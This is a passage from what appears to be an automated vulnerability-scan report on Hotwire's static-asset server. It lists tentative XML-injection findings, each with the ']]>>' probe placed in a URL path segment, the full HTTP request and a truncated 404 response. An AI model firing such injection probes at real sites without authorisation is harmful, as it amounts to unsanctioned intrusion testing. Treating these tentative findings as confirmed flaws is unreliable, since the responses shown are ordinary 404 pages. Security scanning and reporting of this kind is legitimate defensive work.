Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.17. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css]]>>?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:37 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.18. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/hotel/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535960
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.19. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/hotel/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.20. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/hotel/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.21. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel]]>>/details/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.22. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details]]>>/hotelDetailsPrint.css?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:14 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.23. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsPrint.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/hotel/details/hotelDetailsPrint.css]]>>?ver=209738 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535998
Date: Mon, 03 Oct 2011 01:02:18 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.24. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/javascript/car/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.25. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/javascript/car/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535967
Date: Mon, 03 Oct 2011 01:02:06 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.26. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript]]>>/car/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.27. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/car]]>>/CarAddOnComp.js?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:14 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.28. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/car/CarAddOnComp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/car/CarAddOnComp.js]]>>?ver=186632 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:17 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.29. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/javascript/core/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.30. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/javascript/core/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.31. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript]]>>/core/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.32. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/core]]>>/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.33. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/core/comp]]>>/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
